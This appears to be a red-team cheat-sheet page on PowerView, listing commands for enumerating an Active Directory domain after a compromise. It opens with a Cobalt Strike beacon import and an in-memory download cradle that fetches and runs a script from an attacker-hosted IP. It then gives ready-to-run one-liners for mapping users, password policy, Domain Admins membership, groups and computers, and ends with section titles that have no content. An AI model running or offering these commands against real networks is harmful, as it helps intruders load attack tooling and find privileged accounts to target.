PowerView
Enumeration
beacon> powershell-import C:\Tools\PowerSploit\Recon\PowerView.ps1
# PowerView
IEX (New-Object Net.WebClient).DownloadString('http://192.168.80.128:80/view.ps1');
# Domain Info
Get-Domain
Get-DomainController
# Password Policy
(Get-DomainPolicy)."SystemAccess"
Get-DomainPolicyData | select -ExpandProperty SystemAccess
# Enumerate Domain Users
Get-DomainUser | select samaccountname
# Enumerate Domain Users Properties
Get-DomainUser -Properties description,pwnlastset
# Get Detailed Information About Specific Domain User
Get-DomainUser -Identity user1
# Enumerate Domain Groups
Get-DomainGroup | select samaccountname
# Get Domain Groups That Contains The Word "admin".
Get-DomainGroup *admin* | select samaccountname
# Enumerate Domain Computers
Get-DomainComputer | select cn
Get-DomainComputer -Properties DnsHostName | sort -Property DnsHostName
# Emumerate Domain Computers That Respond To Ping Request
Get-DomainComputer -Ping | select cn
# Enumerate Domain OUs
Get-DomainOU | select name
# Enumerate Domain Group Members
Get-DomainGroupMember -Identity "Domain Admins"
# Enumerate Nested Group Members (Recursive)
Get-DomainGroupMember -Identity "Domain Admins" -RecurseUsingMatchingRule | select groupname,membername,memberobjectclass
# Enumerate User Groups
Get-DomainGroup -UserName 'hsaad' | select samaccountname,memberofOpen Shares
Local Groups
Local Admin Access
User Hunting
Domain Group Policy
ACL
SharpView
Last updated